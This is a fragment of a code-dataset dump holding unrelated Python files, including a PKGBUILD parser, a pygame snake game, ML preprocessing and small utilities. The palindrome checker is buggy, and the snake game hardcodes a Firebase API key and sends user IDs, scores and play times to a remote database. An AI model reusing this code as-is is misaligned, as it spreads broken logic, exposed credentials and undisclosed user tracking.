RemoteArchiverTestCase(RemoteArchiverTestCaseBase, ArchiverTestCase):\n \"\"\"run the same tests, but with a remote repository\"\"\"\n\n\n@unittest.skipUnless(\"binary\" in BORG_EXES, \"no borg.exe available\")\nclass ArchiverTestCaseBinary(ArchiverTestCaseBinaryBase, ArchiverTestCase):\n \"\"\"runs the same tests, but via the borg binary\"\"\"\n\n @unittest.skip(\"test_basic_functionality seems incompatible with fakeroot and/or the binary.\")\n def test_basic_functionality(self):\n 
pass\n","repo_name":"0xallie/borg","sub_path":"src/borg/testsuite/archiver/create_cmd.py","file_name":"create_cmd.py","file_ext":"py","file_size_in_byte":38670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"33955517013","text":"import os\nimport shutil\nimport torch\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\nimport torch.nn as nn\nimport numpy as np\n\nfrom PIL import Image\n\n\ndef mkdir(dir_path, dir_name, forced_remove=False):\n new_dir = '{}/{}'.format(dir_path, dir_name)\n if forced_remove and os.path.isdir(new_dir):\n shutil.rmtree(new_dir)\n if not os.path.isdir(new_dir):\n os.makedirs(new_dir)\n\n\ndef touch(file_path, file_name, forced_remove=False):\n new_file = '{}/{}'.format(file_path, file_name)\n assert os.path.isdir(\n file_path), ' \\\"{}\\\" does not exist.'.format(file_path)\n if forced_remove and os.path.isfile(new_file):\n os.remove(new_file)\n if not os.path.isfile(new_file):\n open(new_file, 'a').close()\n\n\ndef write_file(file_path, file_name, content, new_line=True, forced_remove_prev=False):\n touch(file_path, file_name, forced_remove=forced_remove_prev)\n with open('{}/{}'.format(file_path, file_name), 'a') as f:\n f.write('{}'.format(content))\n if new_line:\n f.write('\\n')\n f.close()\n\n\ndef copy_file(src_path, src_file_name, dst_path, dst_file_name):\n shutil.copyfile('{}/{}'.format(src_path, src_file_name),\n '{}/{}'.format(dst_path, dst_file_name))\n\n\ndef ls(dir_path):\n return os.listdir(dir_path)\n\n\ndef generate_ann_mask(mask_path, labels):\n mask = np.array(Image.open(mask_path))\n ann = np.zeros((len(labels), mask.shape[0], mask.shape[1]))\n for ix, (label) in enumerate(labels):\n r, g, b, cat = label\n r, g, b = int(r), int(g), int(b)\n label_mask = (mask[:, :, 0] == r) & (\n mask[:, :, 1] == g) & (mask[:, :, 2] == b)\n ann[ix, :, :] = label_mask\n ann = np.argmax(ann, axis=0)\n return torch.tensor(ann)\n\n\ndef preprocess(mode, items_name, camvid_path, annotation_version):\n assert mode in [\n 'train', 'val', 'test'], 'preprocess mode must be \"train\" or \"val\" or \"test\".'\n assert annotation_version in [1, 2], 'annotation_version must be 1 or 2.'\n\n mkdir('.', mode, forced_remove=False)\n mkdir('./{}'.format(mode), 'images', forced_remove=False)\n mkdir('./{}'.format(mode),\n 'annotations_v{}'.format(annotation_version), forced_remove=False)\n\n labels = [line.split() for line in open(\n './labels_v{}.txt'.format(annotation_version))]\n for label in labels:\n (_, _, _, cat_name) = label\n write_file('{}'.format(mode),\n 'labels_v{}'.format(annotation_version),\n '{}'.format(cat_name),\n new_line=True,\n forced_remove_prev=False)\n\n for ix, (item_name) in enumerate(items_name):\n copy_file('{}/images'.format(camvid_path), item_name,\n './{}/images'.format(mode), item_name)\n\n ann = generate_ann_mask(\n '{}/masks/{}'.format(camvid_path, item_name), labels)\n torch.save(ann, './{}/annotations_v{}/{}'.format(mode,\n annotation_version,\n os.path.splitext(item_name)[0]))\n\n write_file(mode, 'file_names', item_name,\n new_line=True, forced_remove_prev=False)\n print('%s(version %d): %d/%d( %.2f%%)' % (mode,\n annotation_version,\n ix,\n len(items_name),\n (ix/len(items_name))*100\n ))\n\n\ndef _main():\n camvid_path = '.'\n annotation_versions = [1, 2]\n\n images_name = ls('{}/images'.format(camvid_path))\n\n percent = dict()\n percent['train'], percent['val'], percent['test'] = 0.80, 0.05, 0.15\n assert percent['train']+percent['val'] + \\\n 
percent['test'] == 1, '\"train percent\"+ \"val percent\"+ \"test percent\" must be 1.'\n\n items_name = dict()\n items_name['train'] = images_name[0: int(\n len(images_name) * percent['train'])]\n items_name['val'] = images_name[int(len(images_name) * percent['train']): int(\n len(images_name) * (percent['train'] + percent['val']))]\n items_name['test'] = images_name[int(\n len(images_name) * (percent['train'] + percent['val'])): len(images_name)]\n\n for annotation_version in annotation_versions:\n for mode in ['train', 'val', 'test']:\n preprocess(mode, items_name[mode], camvid_path, annotation_version)\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"ahedayat/U-Net","sub_path":"datasets/camvid/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8220919244","text":"import logging\nimport os\nimport pycman\nimport re\nimport subprocess\n\ndef parse_pkgbuild(path, shell=\"bash\"):\n '''\n Source variable from a PKGBUILD\n Use bash to export vars\n\n WARNING: CODE IS EXECUTED\n '''\n # use shell sourcing to resolve custom bashism into PKGBUILD\n argv = [shell, \"-c\", 'set -a; source \"%s\"; pkgname0=\"${pkgname[0]}\"; exec printenv -0' % path]\n # Log it as warn because it's dangerous\n logging.warn(\"Running bash to source file %s\" % path)\n proc = subprocess.Popen(argv, stdout=subprocess.PIPE, shell=False)\n bashout = proc.communicate(\"\")[0].decode().split(\"\\0\")\n bashenv = dict([x.split(\"=\", 1) for x in bashout if \"=\" in x])\n # remove current env\n for env in os.environ:\n bashenv.pop(env, None)\n return bashenv\n\ndef pkgbuild_set_version(path, version, reset=True):\n '''\n Change PKGBUILD $pkgver to version\n if a variable $_pkgver is present, this one will be updated instead of $pkgver\n If reset is True, $pkgrel will be set to 1\n '''\n wspces = \"[ \\t\\r\\f\\v]\"\n data = open(path, \"r\").read()\n # prefer to replace $_pkgver\n var = \"pkgver\" if re.search(\"^%s*_pkgver=\" % wspces, data,\n re.MULTILINE) is None else \"_pkgver\"\n data = re.sub(\"^(%s*%s=).*$\" % (wspces, var),\n \"\\g<1>%s\" % version, data, flags=re.MULTILINE)\n if reset:\n data = re.sub(\"^(%s*pkgrel=).*\" % wspces, \"\\g<1>1\", data,\n flags=re.MULTILINE)\n open(path, \"w\").write(data)\n\ndef pkgbuild_update_checksums(path):\n '''\n Update checksums of PKGBUILD\n Use pacman provided scripts updpkgsums\n '''\n subprocess.check_call([\"updpkgsums\"], shell=False, close_fds=True)\n\nclass Pacman(object):\n '''\n Cheap abstration of archlinux package manager\n This object is a singleton to avoid pyalpm to use too much memory\n '''\n\n _instance = None\n\n def __new__(cls, config=\"/etc/pacman.conf\"):\n # singleton design pattern\n if cls._instance is None:\n cls._instance = object.__new__(cls)\n cls._handle = pycman.config.PacmanConfig(config).initialize_alpm()\n return cls._instance\n\n def find_pkg(self, name, repos=None):\n '''\n find a package named name in repos\n '''\n if repos is None:\n dbs = self._handle.get_syncdbs()\n else:\n dbs = [ db for db in self._handle.get_syncdbs() if db.name in repos ]\n # looking into db for package name\n for db in dbs:\n pkg = db.get_pkg(name)\n if pkg is not None:\n return (db, pkg)\n return (None, None)\n\n# vim:set ts=4 sw=4 et 
ai:\n","repo_name":"seblu/archversion","sub_path":"src/lib/archversion/pacman.py","file_name":"pacman.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"81"} +{"seq_id":"73748473226","text":"# Algorithm for a palindrome checker\n\ndef is_Palindrome(pd):\n startOfIndex = 0\n endOfIndex = len(pd) - 1\n\n for i in pd:\n if pd[startOfIndex] != pd[endOfIndex]:\n return False\n return True\n\n\nprint(is_Palindrome('racecar'))\n","repo_name":"asvirts/meta-back-end-dev","sub_path":"Python Programming/Lessons/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7108706557","text":"import torch\nimport torch.nn as nn \n\nfrom transformers import BertTokenizer\n\n\nclass Qformer(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n\n\nclass Blip2(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n\n self.tokenizer = None \n self.vision_encoder = None \n self.qformer = None \n\n self.queries = nn.Parameter(torch.zeros(1, 32, 768)) \n\n\n @classmethod\n def init_tokenizer(cls, truncation_side='right'):\n tokenier = BertTokenizer.from_pretrained('bert-base-uncased', truncation_side=truncation_side)\n tokenier.add_special_tokens('bos_token', '[DEC]')\n return tokenier\n ","repo_name":"lyuwenyu/AI","sub_path":"mllm/lavis/blip2.py","file_name":"blip2.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"630815334","text":"#! /usr/bin/python3\n\nfrom collections import defaultdict\n\ndef merge_dicts(dicts):\n res = defaultdict(list)\n for dictionary in dicts:\n for key,values in dictionary.items():\n if isinstance(values,list):\n res[key].extend(values)\n else:\n res[key].append(values)\n\n return res\n\n\nif __name__ == '__main__':\n #check merge_dicts\n a = {'a': [1,2,3], 'b': 2, 'c': [2,1]}\n b = {'a': 2, 'b': [12,2,2,2], 'd': 2}\n c = {'a': 2, 'b': 2, 'e': 1}\n print(merge_dicts([a,b,c]))\n","repo_name":"MateusGilbert/nn_temp_compression","sub_path":"aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74794737545","text":"class Solution:\n def wiggleSort(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n arr = sorted(nums)\n \n r = len(arr)-1\n for i in range(1, len(nums), 2):\n nums[i] = arr[r]\n r -= 1\n \n for i in range(0, len(nums), 2):\n nums[i] = arr[r]\n r -= 1\n","repo_name":"novayo/LeetCode","sub_path":"0324_Wiggle_Sort_II/try_1.py","file_name":"try_1.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"4992741628","text":"from layer import Layer, Env\nfrom lambdas.user_event.user_added import user_added_data\nfrom lambdas.user_event.user_deleted1 import user_deleted_data\nfrom lambdas.user_device_event.user_device_binding import user_device_binding_data\nfrom lambdas.user_event.user_updated import user_update_data\n\nfrom devicemanagement.device_cosume import consume_device_event\n\n\ndef consume(data, l: Layer):\n print(\"data type 是--->:{},data 是{}\".format(type(data), data))\n # UserAdded.event\n # ''' [{'userId': '2030836', 
'immutableIdentity': 'tcl-sso:', 'userName': 'Ethan', 'mobile': '13120575591',\n # 'email': 'yuyoung@613.com', 'login_details': [{'accountSystemId': 'tcl-sso', 'loginAccountId': '23222233'}],\n # 'tenantId': '', 'idType': 'passport', 'idNo': '2121212111', 'partnerId': 'china_iot',\n # 'messageType': 'UserAdded.command'}]'''\n\n # UserDeleted.event\n # [{'userId': '2030838', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.event'}, {'userId': '2030839', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.event'}]\n\n # UserDeviceBinding.Event\n # [{'deviceId': '2030838', 'userId': '2030837', 'userRole': '1', 'partnerId': 'china_iot', 'messageType': 'UserDeviceBinding.Event'}]\n session = l.session()\n\n try:\n assert isinstance(data, list)\n # 新增\n if data[0][\"messageType\"] == \"UserAdded.Event\":\n user_added_data(data, session)\n elif data[0][\"messageType\"] == \"UserDeleted.Event\":\n user_deleted_data(data, session)\n elif data[0][\"messageType\"] == \"UserUpdated.Event\":\n user_update_data(data, session)\n elif data[0][\"messageType\"] == \"UserDeviceBinding.Event\":\n user_device_binding_data(data, session)\n else:\n # 处理device的事件\n consume_device_event(data, l)\n # print(\"不是要处理的event的类型,数据为{}\".format(data))\n # pass\n\n except Exception as e:\n print(e)\n session.rollback()\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n l = Layer(Env.DEV)\n user_added_event = [\n {'userId': '400002', 'userName': 'Ethan', 'mobile': '13120575592',\n 'immutable_identity': 'tcl-sso:sso-123456',\n 'email': 'yuyoung@613.com',\n 'login_details': [{'accountSystemId': 'tcl-sso', 'loginAccountId': 'sso-44444'}],\n 'tenantId': 'TCL', 'partnerId': 'ciot',\n 'messageType': 'UserAdded.Event'}]\n\n user_deleted_event = [{'userId': '2030841', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.Event'},\n # {'userId': '2030839', 'partnerId': 'china_iot', 'messageType': 'UserDeleted.event'}\n ]\n user_updated_event = [\n {'userId': '2030841', 'userName': 'Ethan3', 'mobile': '13120575592',\n 'email': 'yuyoung@613.com',\n 'login_details': [{'accountSystemId': 'tcl-sso', 'loginAccountId': 'sso-2030841'}],\n 'tenantId': 'TCL', 'partnerId': 'china_iot',\n 'messageType': 'UserUpdated.Event'}]\n\n user_device_binding_event = [\n {'deviceId': '2030838', 'userId': '2030841', 'userRole': '1', 'partnerId': 'oversea_iot',\n 'messageType': 'UserDeviceBinding.Event'}]\n consume(user_device_binding_event, l)\n","repo_name":"EayonYu/spider-lamdas","sub_path":"lambdas/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4783900780","text":"import subprocess\nimport os \n\n\n\n\n#Ripping the USDA site data for search criteria\nrequest = input(\"Search for what?: \")\nsaved = request \nrequest = request.replace(\" \", \"+\")\nbareRequest = \"https://ndb.nal.usda.gov/ndb/search/list?SYNCHRONIZER_TOKEN=920de5f3-33a0-4c7b-9b55-04f3a1325774&SYNCHRONIZER_URI=%2Fndb%2Fsearch%2Flist&qt=&qlookup=\" + request + \"&ds=&manu=\"\nretcode = subprocess.call(['wget', '-O', 'file.txt', bareRequest], stderr=subprocess.DEVNULL)\n\n#Opening ripped data\ndownloadData = open(\"file.txt\", \"r\")\ncount = 0 \nfor x in downloadData:\n if saved.lower() in x.lower():\n print(x)\n count+=1\n\nprint(\"Read \" + str(count) + \" 
lines\")\n\n","repo_name":"nwrner/FunStuff","sub_path":"spyglass.py","file_name":"spyglass.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74886122826","text":"from machine import Pin, PWM\nfrom time import sleep\n\n#0,2,4,5,12,13,14, and 15 all support PWM\nL1 = Pin(5)\nL2 = Pin(4)\nR1 = Pin(12)\nR2 = Pin(13)\n\npwm_L1 = PWM(L1)\npwm_L2 = PWM(L2)\npwm_R1 = PWM(R1)\npwm_R2 = PWM(R2)\n\n\npwm_L1.freq(100)\npwm_L2.freq(100)\npwm_R1.freq(100)\npwm_R2.freq(100)\n\n#min speed: 350\ndef stop():\n pwm_L1.duty(0)\n pwm_L2.duty(0)\n pwm_R1.duty(0)\n pwm_R2.duty(0)\n\n\ndef forward(l=512,r=512):\n pwm_L1.duty(0)\n pwm_L2.duty(l)\n pwm_R1.duty(0)\n pwm_R2.duty(r)\n\ndef backward(l=512,r=512):\n pwm_L1.duty(l)\n pwm_L2.duty(0)\n pwm_R1.duty(r)\n pwm_R2.duty(0)\n\n\nstop()\n\n\n","repo_name":"netbeaver/micropython_joystick","sub_path":"move_pwm.py","file_name":"move_pwm.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22000516796","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"cx_Freeze installation routines built on top of normal setup.py.\"\"\"\r\nimport os, site, sys\r\n\r\nos.environ[\"GAUPOL_FREEZING\"] = \"1\"\r\nfrom setup import *\r\nimport cx_Freeze\r\n\r\nincludes = (\"aeidon\", \"gaupol\", \"gi\")\r\ninclude_files = []\r\ngnome_path = os.path.join(site.getsitepackages()[1], \"gnome\")\r\nenchant_path = os.path.join(site.getsitepackages()[1], \"enchant\")\r\nfor dll in glob.glob(\"{}\\\\*.dll\".format(gnome_path)):\r\n include_files.append((dll, os.path.basename(dll)))\r\nfor dll in glob.glob(\"{}\\\\*.dll\".format(enchant_path)):\r\n include_files.append((dll, os.path.basename(dll)))\r\nfor lib in (\"etc\", \"lib\", \"share\"):\r\n include_files.append((os.path.join(gnome_path, lib), lib))\r\nfor lib in (\"lib\", \"share\"):\r\n include_files.append((os.path.join(enchant_path, lib), lib))\r\ninclude_files.append((os.path.join(\"build\", \"usr\", \"share\"), \"share\"))\r\n\r\nsetup_kwargs.update(dict(\r\n options=dict(build_exe=dict(compressed=False,\r\n includes=includes,\r\n packages=includes,\r\n include_files=include_files)),\r\n\r\n executables=[cx_Freeze.Executable(script=\"bin/gaupol\",\r\n base=\"Win32GUI\",\r\n icon=\"data/icons/gaupol.ico\")],\r\n\r\n))\r\n\r\nif __name__ == \"__main__\":\r\n cx_Freeze.setup(**setup_kwargs)\r\n","repo_name":"unho/gaupol","sub_path":"winsetup.py","file_name":"winsetup.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"30598975444","text":"import pygame\r\nimport random\r\nimport pyrebase\r\nimport pandas as pd\r\nimport os\r\nfrom datetime import datetime\r\n\r\nnow = datetime.now()\r\ndt_string = now.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n#print(dt_string)\r\ndf = pd.read_excel(\"User_Id.xlsx\",sheet_name=\"User_Email_Id\")\r\nuser_id = df[\"email_id\"][0]\r\nsymbols=['@', '#', '$', '%', '=', ':', '?', '.', '/', '|', '~', '>' , '(', ')', '<',\"!\",\"^\",\"&\",\"_\",\"-\",\"+\",\"=\",\"[\",\"]\",\"{\",\"}\",\"'\",'\"']\r\n\r\nfor i in user_id:\r\n if i in symbols:\r\n user_id = user_id.replace(i,\"\")\r\n user_id = user_id.replace(\"gmailcom\",\"\")\r\n# user_id = game_island.email_value()\r\n#print(\"user_id: \",user_id,\"-->\",type(user_id))\r\n\r\n\r\ntry:\r\n configfirebase = {\"apiKey\": 
\"AIzaSyDLSXHA_9IKUP2f_FLQF5_F_pZX-2E78cE\",\r\n\"authDomain\": \"game-island-123.firebaseapp.com\",\r\n\"databaseURL\": \"https://game-island-123-default-rtdb.asia-southeast1.firebasedatabase.app\",\r\n\"projectId\": \"game-island-123\",\r\n\"storageBucket\": \"game-island-123.appspot.com\",\r\n\"messagingSenderId\": \"673041816597\",\r\n\"appId\": \"1:673041816597:web:1fa678812282337dcd021c\",\r\n\"measurementId\": \"G-WS0W53GRCN\"\r\n }\r\n firebase = pyrebase.initialize_app(configfirebase)\r\n database = firebase.database()\r\n\r\nexcept:\r\n SyntaxError\r\n\r\npath = \"D:\\Study\\Coding\\RanPlay\\Game_Island\\Slither.xlsx\"\r\npath = os.getcwd() + \"/Slither.xlsx\"\r\nis_file = os.path.isfile(path)\r\nif is_file == True:\r\n pass\r\nelse:\r\n df = pd.DataFrame(columns=[\"Score\"])\r\n df.to_excel(\"Slither.xlsx\",engine=\"openpyxl\",sheet_name=\"User_Data\",index=False)\r\n\r\n\r\ndef win_logout():\r\n path_timer = os.getcwd() + \"/Timer.xlsx\"\r\n os.remove(path_timer)\r\n global user_id\r\n now_logout = datetime.now()\r\n logout_time = now_logout.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n logout_ = logout_time.split()\r\n logout_time = logout_[1]\r\n logout_date = logout_[0]\r\n user_data_island = {\"Status\":'End'}\r\n t_island = repr(str(user_data_island))\r\n import json\r\n user_data_dict_island = json.loads(t_island)\r\n database.child(user_id).child(\"Timings\").child(logout_date).child(\"Slither\").child(logout_time).set(user_data_dict_island)\r\n\r\npygame.init()\r\n# sounds\r\n# pygame.mixer.init()\r\npygame.mixer.music.load(\"slither_audio.mp3\")\r\npygame.mixer.music.set_volume(1)\r\npygame.mixer.music.play(-1)\r\n\r\n\r\n# creating colors\r\nblack = (0,0,0)\r\nred = (255,0,0)\r\nblue = (0,0,255)\r\ngreen = (47,232,143)\r\nviolet = (179,109,255)\r\n\r\n\r\n# Creating pygame windows\r\nscreen_width = 400\r\nscreen_height = 500\r\ngame_window = pygame.display.set_mode((screen_width,screen_height))\r\npygame.display.set_caption(\"Slither\")\r\nicon = pygame.image.load(\"Slither_nobg.png\")\r\npygame.display.set_icon(icon)\r\n\r\n\r\n\r\n# defining functions\r\ndef text_screen(text , color ,x ,y,font_size):\r\n font = pygame.font.SysFont(\"comic sans ms\" , font_size)\r\n screen_text = font.render(text,True,color)\r\n game_window.blit(screen_text,[x,y])\r\n\r\ndef plot_snake(gameWindow,color,snk_list,snake_size):\r\n for x, y in snk_list:\r\n pygame.draw.rect(gameWindow,color,[x,y,snake_size,snake_size])\r\n\r\n# Game loop\r\ndef gameloop():\r\n global user_id\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n #print(dt_string)\r\n # Game specific variables\r\n exit_game = False\r\n game_over = False\r\n snake_size = 10\r\n snake_x = screen_width/2\r\n snake_y = screen_height/2\r\n init_velocity = 10\r\n clock = pygame.time.Clock()\r\n fps = 20\r\n velocity_x = 0\r\n velocity_y = 0\r\n food_x = round(random.randint(20,screen_width-snake_size)/10)*10\r\n food_y = round(random.randint(60,screen_height-snake_size)/10)*10\r\n food_size = snake_size\r\n score = 0\r\n data_count = 0\r\n snk_list = []\r\n snk_length = 1\r\n\r\n while not exit_game:\r\n if game_over == True:\r\n data_count += 1\r\n if data_count == 1:\r\n user_data = {\"Score\":(score*10)}\r\n t = repr(str(user_data))\r\n import json\r\n user_data_dict = json.loads(t)\r\n\r\n user_data = [(score*10)]\r\n df = pd.DataFrame(user_data,columns=[(\"Score\")])\r\n with pd.ExcelWriter(\"Slither.xlsx\",mode=\"a\",engine=\"openpyxl\",if_sheet_exists=\"overlay\") as writer:\r\n df.to_excel(writer, 
sheet_name=\"User_Data\",header=None,startrow=writer.sheets[\"User_Data\"].max_row,index=False)\r\n database.child(user_id).child(\"Slither\").child(dt_string).set(user_data_dict)\r\n game_window.fill(\"grey\")\r\n text_screen(\"Game over!\",red,100,180,40)\r\n text_screen(f\"Score: {score*10}\",blue,120,235,40)\r\n text_screen(\"Press ENTER to Play again!\",red,15,300,30)\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT :\r\n win_logout()\r\n exit_game = True\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n gameloop()\r\n\r\n if game_over == False:\r\n if abs(snake_x - food_x) < 8 and abs(snake_y - food_y) < 8:\r\n pygame.mixer.music.set_volume(1)\r\n score += 1\r\n # print(\"Score:\",score)\r\n food_x = round(random.randint(20,screen_width-snake_size)/10)*10\r\n food_y = round(random.randint(60,screen_height-snake_size)/10)*10\r\n snk_length += 2\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT :\r\n win_logout()\r\n exit_game = True\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RIGHT:\r\n velocity_x = init_velocity\r\n velocity_y = 0\r\n if event.key == pygame.K_LEFT:\r\n velocity_x = -init_velocity\r\n velocity_y = 0\r\n if event.key == pygame.K_UP:\r\n velocity_x = 0\r\n velocity_y = -init_velocity\r\n if event.key == pygame.K_DOWN:\r\n velocity_x = 0\r\n velocity_y = init_velocity\r\n\r\n game_window.fill(\"grey\")\r\n text_screen(\"Score: \" + str(score*10) , blue , 5 , 2 , 40) \r\n pygame.draw.rect(game_window,red,[food_x,food_y,food_size,food_size])\r\n pygame.draw.line(game_window,black,(0,51),(400,51),width=4)\r\n pygame.draw.line(game_window,black,(0,498),(400,498),width=4)\r\n pygame.draw.line(game_window,black,(1,0),(1,600),width=4)\r\n pygame.draw.line(game_window,black,(397,0),(397,600),width=4)\r\n head = []\r\n head.append(snake_x)\r\n head.append(snake_y)\r\n snk_list.append(head)\r\n # print(snk_length,\"snake length\")\r\n # print(snk_list,\"snake list\")\r\n # print(head,\"head\") \r\n\r\n if len(snk_list) > snk_length :\r\n del snk_list[0]\r\n\r\n if snake_x < 0 or snake_x >= screen_width or snake_y < 60 or snake_y >= screen_height:\r\n game_over = True\r\n \r\n if head in snk_list[:-1]:\r\n game_over = True\r\n # print(snk_list,\"snake list change\")\r\n # print(head,\"head\")\r\n\r\n # pygame.draw.rect(game_window,grey,[snake_x,snake_y,snake_size,snake_size])\r\n plot_snake(game_window,black,snk_list,snake_size)\r\n snake_x += velocity_x\r\n snake_y += velocity_y\r\n\r\n pygame.display.update()\r\n clock.tick(fps)\r\n \r\n\r\n pygame.quit()\r\n quit()\r\n\r\ngameloop()","repo_name":"Game-Island/Game-Island","sub_path":"Codes/slither.py","file_name":"slither.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33665244580","text":"\"\"\"Initial schema (Message)\n\nRevision ID: 17e84c52321f\nRevises:\nCreate Date: 2021-05-22 12:31:43.408142\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '17e84c52321f'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('message',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(length=160), nullable=False),\n sa.Column('views_count', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_message_id'), 'message', ['id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_message_id'), table_name='message')\n op.drop_table('message')\n # ### end Alembic commands ###\n","repo_name":"BartlomiejRasztabiga/evox","sub_path":"alembic/versions/17e84c52321f_initial_schema_message.py","file_name":"17e84c52321f_initial_schema_message.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"4324446099","text":"#Is used to cut ERA-interim data into the thrr hourly values fed into SAMSIM for atmoflux_flag = 2\n#Is mostly there to turn the integrated values given my ERA_interim in to per time units\n#Only works if the ERA-interim data is already sorted into ascci files called precip.grb.txt, lw.grb.txt, sw.grb.txt, and T2m.grb.txt \n\n\nimport numpy as n\n\nprecip = n.loadtxt(\"./precip.grb.txt\")\n\nlenr=len(precip)\n\n\nprecip2 = precip*10000000\nprecip2[0:lenr:4]=precip[0:lenr:4]\nprecip2[1:lenr:4]=precip[1:lenr:4]-precip[0:lenr:4]\nprecip2[2:lenr:4]=precip[2:lenr:4]-precip[1:lenr:4]\nprecip2[3:lenr:4]=precip[3:lenr:4]-precip[2:lenr:4]\nprecip3 = precip2 / (3*3600) /3 \n\n\nsw = n.loadtxt(\"./sw.grb.txt\")\nsw2 = sw*10000000\nsw2[0:lenr:4]=sw[0:lenr:4]\nsw2[1:lenr:4]=sw[1:lenr:4]-sw[0:lenr:4]\nsw2[2:lenr:4]=sw[2:lenr:4]-sw[1:lenr:4]\nsw2[3:lenr:4]=sw[3:lenr:4]-sw[2:lenr:4]\nsw3 = sw2 / (3*3600)\n\nlw = n.loadtxt(\"./lw.grb.txt\")\nlw = lw\nlw2 = lw*10000000\nlw2[0:lenr:4]=lw[0:lenr:4]\nlw2[1:lenr:4]=lw[1:lenr:4]-lw[0:lenr:4]\nlw2[2:lenr:4]=lw[2:lenr:4]-lw[1:lenr:4]\nlw2[3:lenr:4]=lw[3:lenr:4]-lw[2:lenr:4]\n\n\nlw3=lw2/(3*3600)\n\n\n\nT2m = n.loadtxt(\"./T2m.grb.txt\")\nT2m2 = T2m - 273.15\n\n#Add possible shortening here, otherwise leave cut=0\ncut = 8*365/2\n\nT2mf = T2m2[cut:lenr]\nprecipf = precip3[cut:lenr]\nlwf = lw3[cut:lenr]\nswf = sw3[cut:lenr]\n\n\n#OUTPUT\n\nn.savetxt('T2m.txt.input',T2mf)\nn.savetxt('precip.txt.input',precipf)\nn.savetxt('flux_sw.txt.input',swf)\nn.savetxt('flux_lw.txt.input',lwf)\n\n\n","repo_name":"pgriewank/SAMSIM","sub_path":"input/ERA-interim/scripts/pythonscript.py","file_name":"pythonscript.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"34665117575","text":"#----------------------------------------------------\n# Recherche des zones marines par seuillage\n#----------------------------------------------------\n\n\n# PACKAGES\nfrom PIL import Image # On charge Python Image Library\nimport numpy as np # On charge Numpy \nfrom matplotlib import pyplot as plt # On charge pyplot (un sous module de Matplotlib) et on le renomme plt\n\n# TRAITEMENT IMAGE\nim = Image.open('europe.tif') # PIL permet de lire tous les formats d'images\nNx, Ny = im.size # On reduit la definition de l'image\nim = im.resize((Nx/5, Ny/5), Image.ANTIALIAS)\nZ = np.array(im).astype(np.float64) # On convertir l'image en array \nmax_altitude = 1000. # Altitude maximale en metres, cette donnee est un peu douteuse, (a confirmer).\nZ = Z / Z.max() * max_altitude # On recale les altitudes \n\nZ = np.where(Z > 200., 1., 0.) 
